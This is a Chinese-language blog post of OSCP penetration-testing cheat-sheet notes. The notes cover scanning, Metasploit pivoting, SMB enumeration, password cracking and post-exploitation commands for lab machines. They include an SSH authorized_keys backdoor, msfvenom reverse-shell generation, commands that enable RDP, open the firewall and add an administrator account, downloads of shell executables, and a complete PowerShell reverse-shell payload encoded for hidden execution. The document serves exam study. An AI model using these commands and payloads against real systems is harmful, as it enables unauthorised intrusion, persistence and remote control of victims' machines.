<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>OSCP cheet sheet - Running Man</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Running Man"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Running Man"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="扫描命令"><meta property="og:type" content="blog"><meta property="og:title" content="OSCP cheet sheet"><meta property="og:url" content="https://1ue0v.github.io/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"><meta property="og:site_name" content="Running Man"><meta property="og:description" content="扫描命令"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://1ue0v.github.io/img/og_image.png"><meta property="article:published_time" content="2024-06-05T06:35:31.000Z"><meta property="article:modified_time" content="2024-11-29T09:00:54.548Z"><meta property="article:author" content="1ue0v"><meta property="article:tag" content="Pentest"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://1ue0v.github.io/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://1ue0v.github.io/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"},"headline":"OSCP cheet sheet","image":["https://1ue0v.github.io/img/og_image.png"],"datePublished":"2024-06-05T06:35:31.000Z","dateModified":"2024-11-29T09:00:54.548Z","author":{"@type":"Person","name":"1ue0v"},"publisher":{"@type":"Organization","name":"Running Man","logo":{"@type":"ImageObject","url":"https://1ue0v.github.io/img/logo.svg"}},"description":"扫描命令"}</script><link rel="canonical" href="https://1ue0v.github.io/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="Running Man" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2024-06-05T06:35:31.000Z" title="6/5/2024, 2:35:31 PM">2024-06-05</time></span><span class="level-item">Updated&nbsp;<time dateTime="2024-11-29T09:00:54.548Z" title="11/29/2024, 5:00:54 PM">2024-11-29</time></span><span class="level-item">22 minutes read (About 3261 words)</span></div></div><h1 class="title is-3 is-size-4-mobile">OSCP cheet sheet</h1><div class="content"><h2 id="扫描命令"><a href="#扫描命令" class="headerlink" title="扫描命令"></a>扫描命令</h2><span id="more"></span>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -sC -sS -p0-65535 sandbox.local</span><br><span class="line">sudo nmap -p22,80 -sV -A sandbox.local</span><br><span class="line"># 端口扫描，多跑几次</span><br><span class="line">sudo nmap --min-rate 10000 -p- 192.168.220.118</span><br><span class="line">sudo nmap -p22,80 -sV -A sandbox.local</span><br><span class="line"></span><br><span class="line"># 目录扫描</span><br><span class="line">dirsearch -u http://192.168.212.89 -f -e php,txt,html,zip,rar,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</span><br><span class="line">dirsearch -u http://192.168.237.80 -f -e php,txt,html,zip,rar,tar.gz,tar -w /usr/share/dirb/wordlists/common.txt</span><br><span class="line">gobuster dir -u http://192.168.178.80 -w /usr/share/wordlists/dirb/common.txt</span><br><span class="line">dirsearch -u http://172.16.33.62:7601/ -x 403</span><br><span class="line">dirb http://10.0.2.5/cgi-bin /usr/share/wordlists/dirb/big.txt</span><br><span class="line">gobuster dir -u http://192.168.178.80 -x html,php,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</span><br><span class="line"></span><br><span class="line"># 扫描.zip文件</span><br><span class="line">gobuster dir -u http://192.168.1.22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip</span><br><span class="line"></span><br><span class="line"># Fuzz参数</span><br><span class="line">ffuf -u &#x27;http://192.168.179.80:80/console/file.php?FUZZ=/etc/passwd&#x27; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0</span><br><span class="line"></span><br><span class="line"># dirsearch加上basic-auth认证的参数</span><br><span class="line">dirsearch -u http://192.168.151.191/ -f -e php,txt,html,zip,rar,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --auth dmzadmin:SlimGodhoodMope --auth-type basic</span><br></pre></td></tr></table></figure>

<h2 id="SSH后门"><a href="#SSH后门" class="headerlink" title="SSH后门"></a>SSH后门</h2><p>本地提权之后可以上传ssh公钥，保持长期访问权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ssh -keygen</span><br><span class="line">cat ~/.ssh/id_rsa.pub</span><br><span class="line">mkdir /root/.ssh # 被控机器执行</span><br><span class="line">echo &quot;ssh-rsa AAAxxxxxxx...kali@kali&quot; &gt; /root/.ssh/authorized_keys</span><br><span class="line"></span><br><span class="line">SSH连接目标主机</span><br><span class="line">ssh root@sandbox.local</span><br></pre></td></tr></table></figure>

<h2 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h2><p>auxiliary是探测类型的模块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">use 模块名</span><br><span class="line">search 关键字</span><br><span class="line">search type:auxiliary name:smb</span><br><span class="line">sessions 查看当前session</span><br><span class="line">session -i $id 进入指定的session</span><br><span class="line">run -j 后台运行</span><br><span class="line">bg 把当前session放到后台</span><br><span class="line">migrate $PID 进程迁移</span><br></pre></td></tr></table></figure>

<p>除了基本 Payload，Metasploit还包含多种高级 Payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Staged vs Non-Staged Payloads</span><br><span class="line">Non-Staged:不分阶段Payload 与EXP一起被完整地发送到目标系统</span><br><span class="line"></span><br><span class="line">Staged:分阶段Payload通常分为两部分</span><br><span class="line">第一部分较小，负责建立反弹连接，然后传输较大的第二部分Payload 并执行</span><br><span class="line">当没有足够的缓存空间来存储完整的Payload</span><br><span class="line">避免被AV软件发现，第一阶段不包含明显特征的恶意代码，利用其加载第二阶段代码到内存中执行</span><br></pre></td></tr></table></figure>

<p>名称中的‘&#x2F;’用来指示Payload是否分阶段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">不分阶段:shell_reverse_tcp</span><br><span class="line">分阶段:shell/reverse_tcp</span><br></pre></td></tr></table></figure>

<h2 id="Meterpreter-Shell"><a href="#Meterpreter-Shell" class="headerlink" title="Meterpreter Shell"></a>Meterpreter Shell</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">search meterpreter type:payload</span><br><span class="line">set payload windows/meterpreter/reverse_http</span><br></pre></td></tr></table></figure>

<p>上传下载时目标主机路径要加双\</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\Offsec</span><br><span class="line">download c:\\Windows\\system32\\calc.exe /tmp/calc.exe</span><br></pre></td></tr></table></figure>

<p>msfvenom</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.12 LPORT=443 -f exe -o r.exe</span><br><span class="line">然后kali开侦听</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/shell_reverse_tcp</span><br></pre></td></tr></table></figure>

<p>OSCP考试中不能用msf作跳板</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">route add 内网网段</span><br><span class="line">然后msf内部直接访问内网网段即可</span><br></pre></td></tr></table></figure>

<p>除了手动添加内网路由穿透内网，也可以使用autoroute模块，自动利用已建立的Meterpreter会话穿透内网</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(multi/handler) &gt; use multi/manage/autoroute</span><br><span class="line">msf5 post(multi/managelautoroute) &gt; sessions -l</span><br><span class="line">msf5 post(multi/managelautoroute) &gt; set session 4</span><br><span class="line">msf5 post(multi/manage/autoroute) &gt; exploit</span><br></pre></td></tr></table></figure>

<p>结合路由和server&#x2F;socks4a模块，配置socks4a代理，允许外部工具直接访问内网</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msf5 post(multi/manage/autoroute) &gt; use auxiliary/server/socks4a</span><br><span class="line">msf5 auxiliary(server/socks4a) &gt; set SRVHOST 127.0.0.1</span><br><span class="line">msf5 auxiliary(server/socks4a) &gt; exploit -j</span><br></pre></td></tr></table></figure>

<p>配置Proxychains ,挂代理访问内网</p>
<h2 id="跨平台编译"><a href="#跨平台编译" class="headerlink" title="跨平台编译"></a>跨平台编译</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install mingw-w64</span><br><span class="line">i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe #报错</span><br><span class="line">i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32</span><br><span class="line"></span><br><span class="line">编译32位C语言Windows程序</span><br><span class="line">i686-w64-mingw32-gcc</span><br><span class="line">编译64位C语言Windows程序</span><br><span class="line">x86_64-w64-mingw32-gcc</span><br><span class="line">编译32位C++语言Windows程序</span><br><span class="line">i686-w64-mingw32-g++</span><br><span class="line">编译64位C++语言Windows程序</span><br><span class="line">x86_64-w64-mingw32-g++</span><br></pre></td></tr></table></figure>

<h2 id="SMB-Service"><a href="#SMB-Service" class="headerlink" title="SMB Service"></a>SMB Service</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">smbclient -L 192.168.222.11 # 匿名登录smb</span><br><span class="line">smbmap -H 192.168.222.11</span><br><span class="line">smbclient //192.168.222.11/IPC$ # 匿名查看共享目录</span><br><span class="line">遇到SMB服务一定记得试一下能不能put上传文件</span><br><span class="line">enum4linux -a 192.168.0.109 # 枚举用户等各种信息，在拿不到用户名的时候可以尝试</span><br><span class="line"></span><br><span class="line">检测SMB在指定机器上能否登录</span><br><span class="line">crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success</span><br></pre></td></tr></table></figure>

<h2 id="字符串加解密相关"><a href="#字符串加解密相关" class="headerlink" title="字符串加解密相关"></a>字符串加解密相关</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">++++++++++[&gt;+&gt;+++&gt;+++++++&gt;++++++++++&lt;&lt;&lt;&lt;-]&gt;&gt;++++++++++++++++.++++.&gt;&gt;+++++++++++++++++.----.&lt;++++++++++.-----------.&gt;-----------.++++.&lt;&lt;+.&gt;-.--------.++++++++++++++++++++.&lt;------------.&gt;&gt;---------.&lt;&lt;++++++.++++++.</span><br><span class="line">这种叫Brainfuck/Ook! decode</span><br></pre></td></tr></table></figure>

<h2 id="压缩包破解"><a href="#压缩包破解" class="headerlink" title="压缩包破解"></a>压缩包破解</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">zip2john tom.zip &gt;&gt; has1.txt</span><br><span class="line">john has1.txt #会输出压缩包密码</span><br></pre></td></tr></table></figure>

<h2 id="渗透常用命令"><a href="#渗透常用命令" class="headerlink" title="渗透常用命令"></a>渗透常用命令</h2><p>ssh指定密钥登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i key root@ip</span><br></pre></td></tr></table></figure>

<p>echo写入webshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;&lt;?php xxx&gt;&#x27; &gt;&gt; webshell.php.jpg # 单引号</span><br></pre></td></tr></table></figure>

<p>对隐写的文件进行分析提取 -p是指定密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">steghide extract -sf test.jpg -p 123456</span><br></pre></td></tr></table></figure>

<p>绕过restricted shell，一般就ssh加上-t “bash –noprofile”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/?source=post_page-----c9182b63a4de--------------------------------</span><br></pre></td></tr></table></figure>

<p>shellshock不一定打&#x2F;cgi-bin&#x2F;的cgi文件，打&#x2F;cgi-bin&#x2F;test这种后缀不是cgi的都可以</p>
<p>curl命令进行POST方式上传文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 第一个-F为指定本地上传的文件的路径，@符号必须要有，第二个-F为额外的自定义的参数，可以没有，大部分情况下得有，实际上就是POST传过去的数据</span><br><span class="line">curl -X POST -F &quot;file=@/home/xxx&quot; -F filename=&quot;/tmp/test.txt&quot; http://xxxx.xxx</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"># 生成木马</span><br><span class="line">msfvenom -p payload LPORT= LHOST= -f exe -o eee.exe</span><br><span class="line"></span><br><span class="line"># Windows下载文件</span><br><span class="line">iwr -uri http://192.168.45.192/win_shell.exe -Outfile C:\Windows\Temp\shell.exe</span><br><span class="line"></span><br><span class="line"># 开启3389</span><br><span class="line">REG ADD &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</span><br><span class="line">REG ADD &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v PortNumber /t REG_DWORD /d 0x00000d3d /f</span><br><span class="line"></span><br><span class="line"># 修改windows防火墙配置允许3389</span><br><span class="line">netsh advfirewall firewall add rule name=&quot;Remote Desktop&quot; protocol=TCP dir=in localport=3389 action=allow</span><br><span class="line"></span><br><span class="line"># 新增Windows用户并设置为管理员</span><br><span class="line">net user name password /add</span><br><span class="line">net localgroup administrators 用户名 /add</span><br><span class="line"></span><br><span class="line"># Kali开启ssh</span><br><span class="line">sudo systemctl start ssh</span><br><span class="line"></span><br><span class="line"># Windows访问目标机器共享文件夹</span><br><span class="line">Win+R，然后\\目标IP</span><br><span class="line"></span><br><span class="line"># 内网主机发现（ping扫描）</span><br><span class="line">for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i &gt; nul &amp;&amp; echo 10.5.5.%i is up</span><br><span class="line">for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done</span><br><span class="line"></span><br><span class="line"># win下载文件</span><br><span class="line">iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe</span><br><span class="line"></span><br><span class="line"># rdp</span><br><span class="line">xfreerdp /v:192.168.155.152 /u:student /p:lab</span><br></pre></td></tr></table></figure>

<h2 id="系统常用命令"><a href="#系统常用命令" class="headerlink" title="系统常用命令"></a>系统常用命令</h2><h3 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h3><p>查找指定名称的文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">2&gt;/dev/null是将错误信息重定向到垃圾回收系统</span></span><br><span class="line">find / -name Settings.*  2&gt;/dev/null #looking through the files</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.ddosi.org/oscp-cheat-sheet-2/">https://www.ddosi.org/oscp-cheat-sheet-2/</a></p>
<p>which在$PATH环境变量中搜索指定名称的文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo $PATH</span><br><span class="line">which sbd</span><br></pre></td></tr></table></figure>

<p>locate命令，通过搜索locate.db文件来定位目标文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">使用updatedb命令可升级locate.db</span></span><br><span class="line">sudo updatedb</span><br><span class="line">locate sbd.exe</span><br></pre></td></tr></table></figure>

<p>find 命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">彻底搜索文件系统</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">支持基于名称、时间、大小、所有者、文件类型、时间戮、权限等条件的搜索</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">搜索最近 24 小时修改过的文件</span></span><br><span class="line">find / -mtime 0  </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">搜索最近30分钟修改过的文件</span> </span><br><span class="line">find . -type f -iname &#x27;*.sh&#x27; -mmin -30 -ls </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">对搜索结果执行命令（删除）</span> </span><br><span class="line">find . -name .svn -exec rm -rfo &#123;&#125; \; </span><br><span class="line">find . -name .svn | xargs rm -rf </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">搜索启用 SUID 权限的文件</span></span><br><span class="line">find / -type f -perm -u=s -ls 2&gt;/dev/null </span><br></pre></td></tr></table></figure>

<p>查看系统中可用的服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl list-unit-files</span><br></pre></td></tr></table></figure>

<p>rdp指定域名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75</span><br></pre></td></tr></table></figure>

<p>python生成Windows shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">import sys</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line">payload = &#x27;$client = New-Object System.Net.Sockets.TCPClient(&quot;192.168.45.192&quot;,5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%&#123;0&#125;;while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)&#123;;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + &quot;PS &quot; + (pwd).Path + &quot;&gt; &quot;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()&#125;;$client.Close()&#x27;</span><br><span class="line"></span><br><span class="line">cmd = &quot;powershell -nop -w hidden -e &quot; + base64.b64encode(payload.encode(&#x27;utf16&#x27;)[2:]).decode()</span><br><span class="line"></span><br><span class="line">print(cmd)</span><br></pre></td></tr></table></figure>

<p>启动apache服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service apache2 start </span><br></pre></td></tr></table></figure>

<p>msfconsole开启socks代理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">use multi/manage/autoroute</span><br><span class="line">set session </span><br><span class="line">run</span><br><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set SRVHOST 127.0.0.1</span><br><span class="line">set VERSION 5</span><br><span class="line">run -j</span><br><span class="line">然后使用proxychains打内网</span><br></pre></td></tr></table></figure>

<p>跨平台编译exe</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x86_64-w64-mingw32-gcc adduser.c -o adduser.exe</span><br></pre></td></tr></table></figure>

<p>绕过limited shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo os.system(&quot;/bin/bash&quot;)</span><br></pre></td></tr></table></figure>

<p>确定apache 根目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">检查 /opt/apache2/conf/httpd.conf 或 /opt/apache2/conf/apache2.conf 文件中的 DocumentRoot 指令。</span><br><span class="line">检查 /opt/apache2/conf.d/ 或 /opt/apache2/sites-enabled/ 目录中的虚拟主机配置文件中的 DocumentRoot 指令。</span><br><span class="line">通过这些步骤，你可以确定网站根目录的位置。</span><br></pre></td></tr></table></figure>

<p>查看监听端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ss -lntp</span><br></pre></td></tr></table></figure>

<p>批量检测rdp服务是否可以登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec rdp ip.txt -u aaa -p bbb -d ccc.com</span><br></pre></td></tr></table></figure>

<p>查找当前目录所有文件中是否有指定字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find . | xargs grep -ri &quot;1qaz2wsx#EDC&quot; -l</span><br></pre></td></tr></table></figure>



<h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><p>查看文件内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type $fileName</span><br></pre></td></tr></table></figure>

<p>查看所有文件（包括隐藏文件）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">dir /a</span><br><span class="line">#查看所有文件及其属性</span><br><span class="line">attrib * </span><br></pre></td></tr></table></figure>

<p>&#x2F;users目录中存放每个用户的个人目录，&#x2F;users&#x2F;public目录是共享目录，所有人都可以访问、写入，如果需要写入文件，可以在该目录下</p>
<p>&#x2F;users&#x2F;username&#x2F;Appdata是一个隐藏文件夹，&#x2F;users&#x2F;username&#x2F;Appdata&#x2F;Roaming是在域环境下可能包含用户配置文件的目录</p>
<p>查看远程目标主机的系统信息（前提是被控机器有目标机器的登录权限，或者知道域的用户名和密码）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systeminfo /s $hostname</span><br><span class="line">systeminfo /s $hostname domain\user /P password</span><br></pre></td></tr></table></figure>

<p>查看系统环境变量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set</span><br></pre></td></tr></table></figure>

<p>搜索当前目录及子目录的文件(powershell)</p>
